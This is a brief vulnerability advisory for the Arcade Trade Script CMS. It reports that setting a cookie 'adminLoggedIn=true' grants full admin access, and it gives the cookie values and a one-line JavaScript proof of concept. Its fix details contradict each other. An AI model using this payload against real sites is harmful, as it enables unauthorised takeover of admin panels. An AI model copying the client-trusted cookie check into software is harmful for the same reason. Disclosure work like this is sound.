Arcade Trade Script
   Insecure Cookie Handling
  ===========================




 SUMMARY
 ________

 Arcade Trade Script is a full arcade site CMS (Content Management System)
 with  easy  customization  and  advanced traffic trading system built in. 
 With ATS you will  hardly  ever  have to FTP anything.  Almost all files, 
 pages, and meta tags can be edited from the admin panel. ATS is extremely
 easy to use and works for both regular arcades  and  full  blown  traffic
 trading arcades.

 Please note that this issue has now been fixed!



 IMPACT
 _______

 Leads to full administration rights on the CMS admin panel. 



 VERSIONS
 _________

 Vulnerable systems: ATS versions prior to 1.0

 Immune systems: None
 
 
 
 DESCRIPTION #1
 ______________
 
 Insecure cookie handling allows anyone to simply create a custom cookie
 with the values below.  This will allow full access to the admin panel. 

 Name      - adminLoggedIn
 Content   - true
 Path      - /


 Proof of Concept:
   -> javascript:document.cookie="adminLoggedIn=true; path=/"

 Fix: 
   -> None given. 
    
    

 ADDITIONAL INFO
 _______________
 
 
 Vendor URL         - www.arcadetradescript.com
 Underlying OS      - Linux (Any), UNIX (Any), Windows (Any)
 Credit             - Jay Scott <jay@jayscott.co.uk
 Message History    - Vendor notifyied and problem fixed
                      the following day.